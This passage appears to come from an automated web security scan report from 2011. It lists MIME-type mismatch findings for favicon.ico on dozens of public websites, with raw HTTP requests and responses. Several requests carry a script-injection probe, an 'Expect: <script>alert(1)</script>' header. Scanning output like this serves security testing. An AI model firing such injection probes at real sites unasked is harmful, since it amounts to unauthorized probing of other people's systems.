Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................................Xo#..'..'.."...Yo.........................Rg+..#...Yo.8F4@.Yp#..+...Ti................o.+...\s..%.......J]'...r..Qe*...r.
...[SNIP]...

31.160. http://www.meettheboss.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.meettheboss.tv
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.161. http://www.memoryx.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.memoryx.net
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.memoryx.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:19:51 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.162. http://www.mercadolivre.com.br/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mercadolivre.com.br
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mercadolivre.com.br
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.163. http://www.mirandalambert.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mirandalambert.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mirandalambert.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:29:27 GMT
Server: Apache/2.2.3 (Fedora)
Last-Modified: Tue, 29 Sep 2009 05:16:42 GMT
ETag: "20046052-47e-474b0850b0280"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

............ .h.......(....... ..... .........#...#.............w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...........w...w...w...w...........w...w...........
...[SNIP]...

31.164. http://www.mitsubishi-tv.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mitsubishi-tv.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mitsubishi-tv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:31 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 09 Sep 2009 23:45:15 GMT
ETag: "1c6ea38-423e-acb358c0"
Accept-Ranges: bytes
Content-Length: 16958
Connection: close
Content-Type: text/plain

......@@.... .(B......(...@......... ...................................................................................................................................................................
...[SNIP]...

31.165. http://www.modernlinefurniture.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.modernlinefurniture.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.modernlinefurniture.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 11:00:30 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.166. http://www.momsbreak.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.momsbreak.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.momsbreak.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:38:13 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 15 Dec 2009 20:16:22 GMT
ETag: "8e41f2-2a36-10485180"
Accept-Ranges: bytes
Content-Length: 10806
Connection: close
Content-Type: text/plain

......00.... ..%..&......... .h....%..(...0...`..... ......$.........................~.....y...U...Q...Q...U...r.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~...s...R...Q...Q...Q...Q...Q...Q...Q...`.~~~.~...~~~.~
...[SNIP]...

31.167. http://www.mscd.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mscd.edu
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mscd.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:49:31 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 13 Feb 2009 23:34:16 GMT
ETag: "223086c-57e-462d5466dce00"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain

..............h.......(....... ........................................p;..]......|E...s..\*o.........Z(u..vD.P$......S"..............pM..............yX...M.......u..Y/...S......R!..p;'...x.vQ......J.
...[SNIP]...

31.168. http://www.myaddiction.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.myaddiction.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myaddiction.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:32:59 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 45
Connection: close
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.

31.169. http://www.myfreedegree.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.myfreedegree.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 25
Server: Perlbal
Connection: close

<h1>404 - Not Found</h1>

31.170. http://www.myhealthycat.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.myhealthycat.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=iso-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myhealthycat.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:31 GMT
Server: Apache
Last-Modified: Thu, 29 Apr 2010 23:07:24 GMT
ETag: "1498d24-47e-485683085a300"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=iso-8859-1

............ .h.......(....... ..... .............................................................b...l...................................................i...(c..[j.."6m.2R.."c..He....................
...[SNIP]...

31.171. http://www.myoutofcontrolteen.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.myoutofcontrolteen.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myoutofcontrolteen.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:32:00 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html; charset=iso-8859-1
Age: 0
Proxy-Connection: close
Server: YTS/1.19.8

<h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found

31.172. http://www.nascigs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.nascigs.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.173. http://www.naturalhealers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.naturalhealers.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.naturalhealers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:58:38 GMT
Server: Apache/2.0.52 (Red Hat) PHP/4.3.9 mod_ssl/2.0.52 OpenSSL/0.9.7a
Last-Modified: Thu, 05 Aug 2010 18:33:02 GMT
ETag: "8b836-57e-c7c23380"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=ISO-8859-1

..............h.......(....... ...................................{{{.................{{...............)...1...1......................Bk..9c...B..............{...........{...Zs..s...k...)Z...J...B...9
...[SNIP]...

31.174. http://www.neaq.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.neaq.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.neaq.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:45:09 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Tue, 25 May 2010 00:52:07 GMT
ETag: "2c20a7a-e36-910cfbc0"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: text/plain

..............h...&... ..............(....... ...........@............................~R.......................q..k9.......w...b..............tE...k...............^...u..xK..p@...m..............o>...
...[SNIP]...

31.175. http://www.newjerseyshore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.newjerseyshore.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newjerseyshore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:39 GMT
Server: Apache
Last-Modified: Tue, 03 Aug 2010 14:17:32 GMT
ETag: "47d00fd-e36-fa563700"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@............................kK.....pI7...........p...|.......q..R8......}a..zd..@,..UE..............W6..sS...y......................|W..oT...
...[SNIP]...

31.176. http://www.nextstat.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.nextstat.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextstat.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:44:05 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Wed, 02 Mar 2011 06:31:27 GMT
ETag: "7c261-57e-10024dc0"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .....................................L........................(.............N...........K.........b....x@..9..........-...c.............j...M.'............5............
...[SNIP]...

31.177. http://www.nikonians.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.nikonians.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nikonians.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:15:19 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Jan 2009 14:55:00 GMT
ETag: "4800885-47e-4618c27ecf900"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain

............ .h.......(....... ..... ..........................ww.T66.V44.V44.V44.V44.V44.V44.V44.V44.V44.V44.V44.V44.V44..ww..ww.kGG.nII.nII.nII.nII.nII.nII.nII.nII.nII.nII.nII.nII.nII..ww..ww.kGG.hE
...[SNIP]...

31.178. http://www.nin.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.nin.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nin.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Fri, 17 Sep 2010 13:58:36 GMT
Server: Apache
Last-Modified: Fri, 16 Nov 2007 05:52:49 GMT
ETag: "488c00d-37e-6897ae40"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8
Age: 6381
X-Cache: HIT from ninweb2.sudjam.com
X-Cache-Lookup: HIT from ninweb2.sudjam.com:80
Via: 1.0 ninweb2.sudjam.com:80 (squid/2.6.STABLE22)
Connection: keep-alive

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

31.179. http://www.northstarmls.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.northstarmls.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.northstarmls.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.180. http://www.oceana.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.oceana.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oceana.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:02:13 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 30 Oct 2006 00:27:20 GMT
ETag: "23c25b-e36-55318a00"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@............................ro.....k0#.........8...|MC.....R. ..............\Q..............bb.^"...............|v.........o:-...............
...[SNIP]...

31.181. http://www.osbornewood.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.osbornewood.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.osbornewood.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:48 GMT
Server: Apache/2.2.16 (EL)
Last-Modified: Mon, 08 Mar 2010 17:27:10 GMT
ETag: "23c0a04-47e-4814d60013780"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=31536000
Expires: Wed, 02 May 2012 10:50:48 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .........................................e..Fe...e...e...e...e...e...e..F........................e.. e...P...2S`..)/..........)/.2S`.P...e...e.. ............e.. e.
...[SNIP]...

31.182. http://www.osneaker.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.osneaker.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.osneaker.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:19:52 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.183. http://www.parentsask.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.parentsask.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.parentsask.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.13 (Fedora)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 45
Date: Tue, 03 May 2011 10:26:22 GMT
X-Varnish: 1738515331
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
X-Varsion: deca_active 0.9

The requested file favicon.ico was not found.

31.184. http://www.pemonitorhosted.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pemonitorhosted.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.185. http://www.photostockplus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.photostockplus.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.photostockplus.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:23:55 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Jul 2008 17:07:23 GMT
ETag: "ac149f-627e-45227287808c0"
Accept-Ranges: bytes
Content-Length: 25214
Content-Type: text/plain

.... .00......h....... ......................(.... ..00.............. ......................h...^"..00.... ..%...'.. .... .....nM........ .h....^..(...0...`.........................................
...[SNIP]...

31.186. http://www.piworld.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.piworld.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.piworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:21:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 17 Nov 2010 14:17:11 GMT
ETag: "47e-544387c0"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=utf-8

............ .h.......(....... ..... ..........................a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...[...[...[
...[SNIP]...

31.187. http://www.pixela.co.jp/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pixela.co.jp
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pixela.co.jp
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:27:30 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 02 Dec 2010 14:53:43 GMT
ETag: "84cd48-cbe-4966e96896bc0"
Accept-Ranges: bytes
Content-Length: 3262
Content-Type: text/plain

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

31.188. http://www.plattformpartners.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plattformpartners.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.plattformpartners.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:04:57 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 45
Connection: close
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.

31.189. http://www.poetrynation.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.poetrynation.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.poetrynation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:07 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 07 Apr 2011 15:59:28 GMT
ETag: "5c800cd-10be-4a05631ae9800"
Accept-Ranges: bytes
Content-Length: 4286
Connection: close
Content-Type: text/plain

...... .... .........(... ...@..... ...................................................................t...............................................................................................
...[SNIP]...

31.190. http://www.pokeorder.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pokeorder.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pokeorder.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:50:08 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.191. http://www.popsugar.co.uk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.popsugar.co.uk
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popsugar.co.uk
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web014-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Content-Type: image/gif
Server: lighttpd/1.4.26
Content-Length: 294
Date: Tue, 03 May 2011 10:34:19 GMT
Connection: close

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b`....Lm...|j..h..R..\E.#....c.c8.f.(. ..H..@.>.r....#if.......P@Z......M#6.r.. ~...Y..z......(;..... 5..4......H.G.!`.(
...[SNIP]...

31.192. http://www.portalprogramas.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.portalprogramas.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.portalprogramas.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:52:01 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 16:17:46 GMT
ETag: "688001-47e-22bb9e80"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=2592000
Expires: Thu, 02 Jun 2011 10:52:01 GMT
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ....................................................:...................3..........................................................................................
...[SNIP]...

31.193. http://www.pponline.co.uk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pponline.co.uk
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pponline.co.uk
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:28:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 14 Oct 2010 13:42:00 GMT
Accept-Ranges: bytes
Content-Length: 350
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 11:28:32 GMT
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

..............(.......(....... ........................................................................{...c...Z...R..............t....0......;@..C....j0.\P............l...@.....l......|.......,.@4B..
...[SNIP]...

31.194. http://www.projectguitar.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.projectguitar.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.projectguitar.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not found
Server: Zeus/4.3
Date: Tue, 03 May 2011 11:04:53 GMT
Connection: close
Content-Type: text/html

<H5>Error 404</H5>

31.195. http://www.purplepug.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.purplepug.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
